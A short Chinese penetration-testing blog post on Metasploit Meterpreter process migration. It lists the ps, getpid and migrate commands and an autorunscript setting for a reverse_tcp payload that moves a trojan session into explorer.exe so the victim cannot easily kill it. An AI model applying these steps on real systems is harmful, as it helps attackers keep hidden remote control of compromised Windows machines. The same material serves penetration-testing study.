1.进程迁移
1.在Meterpreter下输入ps(获取目标机正在运行的进程,记住目标进程的pid xxxx)
2.输入getpid命令(查看meterpreter shell的进程号)
3.输入migrate xxxx(将meterpreter shell的pid调到xxxx里相对稳定应用的进程里)
4.最后用getpid再次查看下是否更换成功。
2.上线后自动化迁移指定进程
在set payload windows/meterpreter/reverse_tcp 设置完了端口与HOST
执行如下命令:set autorunscript migrate -n explorer.exe
意思是上线后将shell进程迁移到了资源管理器。防止被用户删除掉,然后丢失目标。
实验结论
- 在迁移后有些时候会掉线,但是别急,你继续exploit监听,等几十秒会连接上。
- 重启目标资源管理器也会导致目标掉线。
本博客所有文章如无特别注明均为原创。作者:小陈 ,复制或转载请以超链接形式注明转自 小陈's Blog - 致力关注于黑客技术、渗透测试、网络信息安全 。
原文地址《Msf生成木马目标上线后自动化迁移指定进程》
原文地址《Msf生成木马目标上线后自动化迁移指定进程》
发表评论